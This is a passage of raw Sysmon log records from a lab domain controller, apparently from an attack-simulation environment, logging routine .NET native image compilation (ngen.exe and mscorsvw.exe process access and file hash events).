dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.668{4DB9351A-A279-60D3-8105-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X6S2NBQ6G0\Microsoft.Windows.Diagnosis.SDEngine.ni.dll.auxMD5=F1F8341A8B2A9FE635D29A016C84D091,SHA256=36297F3BE25FCA63383E3C347319B5667491DC0DE665DACC147D068A47EC3CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.668{4DB9351A-A279-60D3-8105-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X6S2NBQ6G0\Microsoft.Windows.Diagnosis.SDEngine.ni.dllMD5=91401FE3119EB03D94519FB8611CA3A9,SHA256=AFC651ABA48764C28858807ABE57ADAAC9649FA82C0468857F43A11E35C14980,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.652{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8105-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.636{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8105-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.636{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8105-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.636{4DB9351A-A279-60D3-8005-00000000CF01}6620NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UTVN1S6V3R\Microsoft.Windows.Diagnosis.SDCommon.ni.dll.auxMD5=3F666AAC1B3038F1B6361C01514866ED,SHA256=EDE9020B906DC12426F9A1B71CAFF16A6544A2BA6A433F090D97A5AA2A09821B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.636{4DB9351A-A279-60D3-8005-00000000CF01}6620NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UTVN1S6V3R\Microsoft.Windows.Diagnosis.SDCommon.ni.dllMD5=CC6684143F996F0BA66CB3B3240C8B29,SHA256=610360126AA509CE88B7C47DEFCD13DF70E61827867910333FE566D76BF22768,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-8005-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.589{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-8005-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.589{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-8005-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.589{4DB9351A-A279-60D3-7F05-00000000CF01}5136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\69XCW4PRU6\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dll.auxMD5=0BF02B9E4B79A89F59CBE91B2D2E928B,SHA256=EB6D80CAA7B14C57895DDF276CA391A9C57E5669C640C5BF25FE6BFAF7DC457C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.589{4DB9351A-A279-60D3-7F05-00000000CF01}5136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\69XCW4PRU6\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dllMD5=4F8AE868891EAD1A5902A6C9804ACFBC,SHA256=E1539B98884213E195AA711A50ADDE934D9F67867F42FA68CF3EA06701B68A03,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.558{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7F05-00000000CF01}5136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.543{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7F05-00000000CF01}5136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.543{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7F05-00000000CF01}5136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.543{4DB9351A-A279-60D3-7E05-00000000CF01}7124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T9S92YUGX6\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dll.auxMD5=B6EE23DD0D59E1110C73C8181A683EB2,SHA256=F322704258EE53C446AE8E956575C984AACF22F05E88C0D9A4A6F1DF00569BC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.543{4DB9351A-A279-60D3-7E05-00000000CF01}7124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\T9S92YUGX6\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.ni.dllMD5=05C69DC37B2DF503E97DFC4C90FA1E39,SHA256=1B5E577C2D04335347BCF8104BD0935B0660624C9570CB6E388F5EEED08641BB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.527{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6A364410B202A4BB67C42875FDE0E5,SHA256=E2456F3AB4C0E71D1894B5EF45D97CF173BA1F6DFAD5C4AEC98952DEE18A030A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.511{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7E05-00000000CF01}7124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.480{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7E05-00000000CF01}7124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.480{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7E05-00000000CF01}7124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.480{4DB9351A-A279-60D3-7D05-00000000CF01}1320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\06YCPMZGA3\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.ni.dll.auxMD5=2D56EE767451F194D7F7E0448091B419,SHA256=BEA7659FF1C8DC6A2EF39855107FA1AD30F225120E8356E01349EA995F5F63D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.480{4DB9351A-A279-60D3-7D05-00000000CF01}1320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\06YCPMZGA3\Microsoft.Windows.Diagnosis.Commands.UpdateDiagReport.ni.dllMD5=2F69DB0866DF2EF793094DE48C8E1BA5,SHA256=6475F1DFBC8009530D39E91412DF1326BB849AA04F4BA6509AAD2636FBF515AA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.449{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7D05-00000000CF01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.433{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7D05-00000000CF01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.433{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7D05-00000000CF01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.418{4DB9351A-A279-60D3-7C05-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMPX9LRAAI\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dll.auxMD5=0698A426646E6BC41E0726BD2E86BD7B,SHA256=D1BE629112B29F3EB80EBE354CD9AF00FB1E780165FEE08259558554B80CE35F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.418{4DB9351A-A279-60D3-7C05-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FMPX9LRAAI\Microsoft.Windows.Diagnosis.Commands.GetDiagInput.ni.dllMD5=5BD20FAC3B8093E0B3C7654C5FEF88F0,SHA256=9409FCB09A07163DA22934277F4873BA32B4B547018261CEB909EF8B270E6464,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.402{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7C05-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 